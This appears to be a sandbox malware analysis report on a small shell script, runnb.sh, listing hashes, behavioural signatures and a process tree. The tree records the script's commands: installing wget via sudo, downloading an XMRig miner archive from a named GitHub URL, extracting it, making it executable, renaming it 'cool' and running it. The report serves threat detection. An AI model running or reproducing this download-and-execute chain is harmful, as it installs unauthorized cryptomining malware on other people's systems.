Analysis
max time kernel: 1s
max time network: 129s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 30/10/2024, 13:11
Static task: static1
Behavioral task: behavioral1 (Sample: runnb.sh, Resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (Sample: runnb.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: runnb.sh, Resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (Sample: runnb.sh, Resource: debian9-mipsel-20240611-en)
General
Target: runnb.sh
Size: 213B
MD5: a1189543e2f98f6696c6d857b899ab0a
SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 1 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid | Process
1580 | chmod

Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
Abuse sudo or cached sudo credentials to execute code.
pid | Process
1533 | sudo

Enumerates kernel/hardware configuration (1 TTPs, 4 IoCs)
Reads contents of /sys virtual filesystem to enumerate system information.
description | ioc | Process
File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | snap
File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | snap
File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | snap
File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | snap
Reads runtime system information
description | ioc | Process
File opened for reading | /proc/sys/kernel/ngroups_max | sudo
File opened for reading | /proc/self/fd | apt
File opened for reading | /proc/cgroups | snap
File opened for reading | /proc/cgroups | snap
File opened for reading | /proc/cgroups | snap
File opened for reading | /proc/filesystems | tar
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/cgroups | snap
File opened for reading | /proc/cmdline | snap
File opened for reading | /proc/cmdline | snap
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/cmdline | snap
File opened for reading | /proc/cmdline | snap
File opened for reading | /proc/filesystems | mv
File opened for reading | /proc/filesystems | sudo
File opened for reading | /proc/self/stat | sudo
Writes file to tmp directory (16 IoCs)
Malware often drops required files in the /tmp directory.
description | ioc | Process
File opened for modification | /tmp/fileutl.message.x5Ceos | apt
File opened for modification | /tmp/fileutl.message.XU2EzE | apt
File opened for modification | /tmp/fileutl.message.g2qIKQ | apt
File opened for modification | /tmp/fileutl.message.5txVqS | apt
File opened for modification | /tmp/fileutl.message.KPYsiF | apt
File opened for modification | /tmp/fileutl.message.OPXXkR | apt
File opened for modification | /tmp/fileutl.message.IwFAt3 | apt
File opened for modification | /tmp/fileutl.message.bBFkPQ | apt
File opened for modification | /tmp/fileutl.message.wTi3lt | apt
File opened for modification | /tmp/fileutl.message.cB60Yr | apt
File opened for modification | /tmp/fileutl.message.T0df92 | apt
File opened for modification | /tmp/fileutl.message.OIT8kE | apt
File opened for modification | /tmp/fileutl.message.HAHzxf | apt
File opened for modification | /tmp/fileutl.message.395Zj4 | apt
File opened for modification | /tmp/fileutl.message.9QEbig | apt
File opened for modification | /tmp/fileutl.message.yEkgHf | apt
Processes
(process tree; each entry is: path | command line | PID, indented by depth, with the signatures triggered by that process listed beneath it)

/tmp/runnb.sh | /tmp/runnb.sh | PID:1532
    /usr/bin/sudo | sudo apt install wget | PID:1533
      - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
      - Reads runtime system information
    /usr/bin/apt | apt install wget | PID:1537
      - Reads runtime system information
      - Writes file to tmp directory
        /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures | PID:1538
          - Reads runtime system information
        /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures | PID:1542
          - Reads runtime system information
        /bin/sh | /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true" | PID:1543
            /usr/bin/snap | /usr/bin/snap advise-snap --from-apt | PID:1544
              - Enumerates kernel/hardware configuration
              - Reads runtime system information
        /bin/sh | /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true" | PID:1553
            /usr/bin/snap | /usr/bin/snap advise-snap --from-apt | PID:1554
              - Enumerates kernel/hardware configuration
              - Reads runtime system information
        /bin/sh | /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true" | PID:1560
            /usr/bin/snap | /usr/bin/snap advise-snap --from-apt | PID:1561
              - Enumerates kernel/hardware configuration
              - Reads runtime system information
        /bin/sh | /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true" | PID:1566
            /usr/bin/snap | /usr/bin/snap advise-snap --from-apt | PID:1567
              - Enumerates kernel/hardware configuration
              - Reads runtime system information
    /usr/bin/wget | wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz | PID:1575
    /bin/tar | tar xvf xmrigtar.tar.gz | PID:1579
      - Reads runtime system information
    /bin/chmod | chmod +x xmrig | PID:1580
      - File and Directory Permissions Modification
    /bin/mv | mv xmrig cool | PID:1581
      - Reads runtime system information
    /tmp/cool | ./cool | PID:1582
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 235KB
MD5: 373fe2f2ef99005d2550a482f09a3e51
SHA1: 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d
SHA256: 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5
SHA512: def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b